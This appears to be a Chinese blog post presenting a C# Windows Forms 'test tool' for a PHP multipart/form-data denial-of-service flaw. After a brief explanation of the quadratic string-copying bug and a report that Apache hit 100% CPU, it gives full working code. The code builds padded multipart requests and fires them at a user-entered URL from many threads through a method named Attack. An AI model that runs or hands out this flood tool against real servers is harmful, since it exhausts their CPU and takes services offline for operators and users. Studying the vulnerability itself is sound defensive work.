php multipart/form-data DOS C#测试工具

根据乌云网，百度攻防安全实验室提供的最新漏洞，存在于php各版本：

PHP解析multipart/form-data http请求的body part请求头时，重复拷贝字符串导致DOS。远程攻击者通过发送恶意构造的multipart/form-data请求，导致服务器CPU资源被耗尽，从而远程DOS服务器。

原文链接：http://drops.wooyun.org/papers/6077

大致是因为php解析请求时，是按行读取数据，然后每读取一行进行一次内存分配和内存拷贝，这样会耗掉n^2的时间，原文的利用方式是Python，现提供C#的代码：

对本地测试的结果，apache cpu占用100%：

代码：

using System;using System.Collections.Generic;using System.Collections.Specialized;using System.ComponentModel;using System.Data;using System.Drawing;using System.IO;using System.Linq;using System.Net;using System.Text;using System.Threading.Tasks;using System.Windows.Forms;using System.Threading;namespace WindowsFormsApplication1{    public partial class Form1 : Form    {        public Form1()        {            InitializeComponent();        }        private void button1_Click(object sender, EventArgs e)        {            string s = HttpPostData().ToString();            s = "响应时间：" + s;            MessageBox.Show(s);        }        private double HttpPostData()        {            string url=this.textBox1.Text;            int timeOut = 10000, lcount = int.Parse(textBox2.Text);            string responseContent;            string fileKeyName = "file";            string filePath = "58.jpg";                        var memStream = new MemoryStream();            var webRequest = (HttpWebRequest)WebRequest.Create(url);            // 边界符            var boundary = "---------------" + DateTime.Now.Ticks.ToString("x");            // 边界符            var beginBoundary = Encoding.ASCII.GetBytes("--" + boundary + "\r\n");                       // 最后的结束符            var endBoundary = Encoding.ASCII.GetBytes("--" + boundary + "--\r\n");            // 设置属性            webRequest.Method = "POST";            webRequest.Timeout = timeOut;            webRequest.ContentType = "multipart/form-data; boundary=" + boundary;            // 写入文件            const string filePartHeader =                "Content-Disposition: form-data; name=\"{0}\"; filename=\"s";            var header = string.Format(filePartHeader, fileKeyName);            var headerbytes = Encoding.UTF8.GetBytes(header);            memStream.Write(beginBoundary, 0, beginBoundary.Length);            memStream.Write(headerbytes, 0, headerbytes.Length);            var buffer = new byte[2];            buffer = Encoding.UTF8.GetBytes("a\n");            int bytesRead=2; // =0            for (int i = 0; i < lcount;i++ )                memStream.Write(buffer, 0, bytesRead);            var bb = "\"\nContent-Type: application/octet-stream\r\n\r\ndatadata\r\n";            bb += boundary;            bb += "--";            var body = new byte[1024];            body=Encoding.UTF8.GetBytes(bb);                        memStream.Write(body, 0, Encoding.UTF8.GetByteCount(bb));            // 写入最后的结束边界符            memStream.Write(endBoundary, 0, endBoundary.Length);            webRequest.ContentLength = memStream.Length;            var requestStream = webRequest.GetRequestStream();            memStream.Position = 0;            var tempBuffer = new byte[memStream.Length];            memStream.Read(tempBuffer, 0, tempBuffer.Length);            memStream.Close();            requestStream.Write(tempBuffer, 0, tempBuffer.Length);            requestStream.Close();            DateTime d = DateTime.Now;            var httpWebResponse = (HttpWebResponse)webRequest.GetResponse();            using (var httpStreamReader = new StreamReader(httpWebResponse.GetResponseStream(),                                                            Encoding.GetEncoding("utf-8")))            {                responseContent = httpStreamReader.ReadToEnd();            }                       httpWebResponse.Close();            webRequest.Abort();                        return (DateTime.Now-d).TotalSeconds;        }        private void Attack()        {            string url = this.textBox1.Text;            int timeOut = 10000, lcount = int.Parse(textBox2.Text);            string responseContent;            string fileKeyName = "file";            string filePath = "58.jpg";            var memStream = new MemoryStream();            var webRequest = (HttpWebRequest)WebRequest.Create(url);            // 边界符            var boundary = "---------------" + DateTime.Now.Ticks.ToString("x");            // 边界符            var beginBoundary = Encoding.ASCII.GetBytes("--" + boundary + "\r\n");            // 最后的结束符            var endBoundary = Encoding.ASCII.GetBytes("--" + boundary + "--\r\n");            // 设置属性            webRequest.Method = "POST";            webRequest.Timeout = timeOut;            webRequest.ContentType = "multipart/form-data; boundary=" + boundary;            // 写入文件            const string filePartHeader =                "Content-Disposition: form-data; name=\"{0}\"; filename=\"s";            var header = string.Format(filePartHeader, fileKeyName);            var headerbytes = Encoding.UTF8.GetBytes(header);            memStream.Write(beginBoundary, 0, beginBoundary.Length);            memStream.Write(headerbytes, 0, headerbytes.Length);            var buffer = new byte[2];            buffer = Encoding.UTF8.GetBytes("a\n");            int bytesRead = 2; // =0            for (int i = 0; i < lcount; i++)                memStream.Write(buffer, 0, bytesRead);            var bb = "\"\nContent-Type: application/octet-stream\r\n\r\ndatadata\r\n";            bb += boundary;            bb += "--";            var body = new byte[1024];            body = Encoding.UTF8.GetBytes(bb);            memStream.Write(body, 0, Encoding.UTF8.GetByteCount(bb));            // 写入最后的结束边界符            memStream.Write(endBoundary, 0, endBoundary.Length);            webRequest.ContentLength = memStream.Length;            var requestStream = webRequest.GetRequestStream();            memStream.Position = 0;            var tempBuffer = new byte[memStream.Length];            memStream.Read(tempBuffer, 0, tempBuffer.Length);            memStream.Close();            requestStream.Write(tempBuffer, 0, tempBuffer.Length);            requestStream.Close();            DateTime d = DateTime.Now;            var httpWebResponse = (HttpWebResponse)webRequest.GetResponse();            using (var httpStreamReader = new StreamReader(httpWebResponse.GetResponseStream(),                                                            Encoding.GetEncoding("utf-8")))            {                responseContent = httpStreamReader.ReadToEnd();            }            httpWebResponse.Close();            webRequest.Abort();        }        private void button2_Click(object sender, EventArgs e)        {                        int n = int.Parse(textBox3.Text);             for(int i=0;i<n;i++)            {                new Thread(Attack).Start();            }        }    }}